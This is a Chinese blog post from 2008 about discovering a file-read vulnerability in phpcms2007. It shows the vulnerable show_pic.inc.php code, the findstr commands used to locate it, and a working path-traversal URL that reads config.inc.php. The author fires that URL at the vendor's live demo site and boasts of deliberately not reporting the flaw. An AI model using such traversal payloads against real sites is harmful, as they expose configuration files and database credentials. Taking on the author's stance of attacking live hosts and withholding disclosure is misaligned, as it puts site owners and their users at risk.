当前位置: 代码网 > 服务器>网络安全>企业安全 > 关于简单的php源代码泄露漏洞的发掘

关于简单的php源代码泄露漏洞的发掘

2008年10月08日 企业安全 我要评论
关于简单的php源代码泄露漏洞的发掘 我们知道在asp中出现得最多的还是sql注入,不过在php中由于magic_quotes_gpc为on的情况下特殊字符会被转义,所以即使有很多时候存在sql注入也无法利用。但是php强大的文件操作功能却... 08-10-08
我们知道在asp中出现得最多的还是sql注入,不过在php中由于magic_quotes_gpc为on的情况下特殊字符会被转义,所以即使有很多时候存在sql注入也无法利用。但是php强大的文件操作功能却使我们能体会到在asp中无法体会的乐趣,我想php自带的文件操作函数能让你为之心跳加快~~嘿嘿 这次我发掘的是phpcms2007的源代码泄露漏洞 再次向phpcms2007的开源行为致敬!! 开始吧, findstr /s /n /i readfile *.php >readfile.txt (结果我只给出有用的) 其他的文件操作函数可以自己定义查找 module\picture\show_pic.inc.php:8:readfile($file); 跟进这个文件看看吧,呵呵,比较小,我喜欢 [copy to clipboard] [ - ]code:
<?php
defined(’in_phpcms’) or exit(’access denied’);
require phpcms_root.’/module/’.$mod.’/include/common.inc.php’;
isset($src) or exit;
$file = phpcms_root.’/’.$phpcms[’uploaddir’].’/’.$cha[’channeldir’].’/’.$mod[’upload_dir’].’/’.$src;
if(empty($php_referer) || !strpos($php_referer, $php_domain)) $file = phpcms_root.’/images/error.jpg’;
header("content-type:image/pjpeg");
readfile($file);
?>
一路分析下。。。 先包含文件/module/’.$mod.’/include/common.inc.php 如果存在变量$src则赋予它路径并把值交给变量$file 然后就是就进入if 这里我不看其他的文件简单猜测下应该是判断url路径来源,也就是防盗链的功能 然后就header()一个图片头 呵呵,轻轻松松就readfile($file); 可以看出它没有判断$src的文件类型,如果我们提交一个src=*.php也会被readfile 好吧,在这里漏洞是出现了 不过由于“defined(’in_phpcms’) or exit(’access denied’);”,所以我们是无法直接利用这个漏洞文件的 只能是在其他包含这个文件的php文件中利用 继续吧 [copy to clipboard] [ - ]code:
findstr /s /i /n show_pic.inc.php *.php >show_pic.inc.php.txt picture\show_pic.php:4:require phpcms_root."/module/".$mod."/show_pic.inc.php";
进去看看 [copy to clipboard] [ - ]code:
<?php
require "./config.inc.php";
require "../include/common.inc.php";
require phpcms_root."/module/".$mod."/show_pic.inc.php";
?>
呵呵,要是register_globals为on的话就可以直接利用这个文件读取目标文件了
那就测试吧 官方是演示站是 [copy to clipboard] [ - ]code:
http://demo.phpcms.cn/
那就这样构造url [copy to clipboard] [ - ]code:
/picture/show_pic.php?src=/../../../config.inc.php
嘿嘿,读取的就是网站的配置文件 直接访问 [copy to clipboard] [ - ]code:
http://demo.phpcms.cn//picture/show_pic.php?src=/../../../config.inc.php
呵呵,猜测没错!! 那我们可以先访问http://demo.phpcms.cn/抓包 用nc发包 get选项就设置为 [copy to clipboard] [ - ]code:
/picture/show_pic.php?src=/../../../config.inc.php
这里我就用刺猬的一个post提交工具代替了 测试结果如图 ok,就分析到这里了 希望大家不要利用这个做违法的事,嘿嘿!! 偶是坏孩子,不通知官方了~·好孩子去通知下。

(0)

相关文章:

  • 分析黑客是如何破坏杀毒软件的

    分析黑客是如何破坏杀毒软件的

    分析黑客是如何破坏杀毒软件的 最近有调查报告显示,知名品牌的杀毒软件对新型计算机病毒的查杀率只有20%,而漏杀率却高达80%。那么是什么原因造成这种状况的?到... [阅读全文]
  • 详述入侵渗透技术

    详述入侵渗透技术

    详述入侵渗透技术 入侵渗透涉及许多知识和技术,并不是一些人用一两招就可以搞定的。 一,踩点 踩点可以了解目标主机和网络的一些基本的安全信息,主要有; 1... [阅读全文]
  • 简介六大数据库攻击手段

    简介六大数据库攻击手段

    简介六大数据库攻击手段 普通的黑客从进入到退出一次数据攻击只需用不到10秒钟时间就可完成,这个时间对于数据库管理员来说即使注意到入侵者都几乎不够。因此,在数据... [阅读全文]
  • Rootkit技术之内核钩子原理

    Rootkit技术之内核钩子原理

    Rootkit技术之内核钩子原理 我们知道,应用程序总是离不开系统内核所提供的服务,比如它要使用内存的时候,只要跟操作系统申请就行了,而不用自己操心哪里有空闲... [阅读全文]
  • 入侵实例看视频服务器安全部署策略

    入侵实例看视频服务器安全部署策略

    入侵实例看视频服务器安全部署策略 视频服务器都会提供大量的视频资源,大部分都提供了在线观看以及下载服务。对于流量要求比较高,而从服务器本身的部署来看,也有一些... [阅读全文]
  • 菜鸟要了解的三种后门技术安全知识

    菜鸟要了解的三种后门技术安全知识

    菜鸟要了解的三种后门技术安全知识 曾经饱受木马、后门(以下统称后门)侵害的人们都不会忘记机器被破坏后的惨象,于是人们展开了积极的防御工作,从补丁到防火墙,恨不... [阅读全文]

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com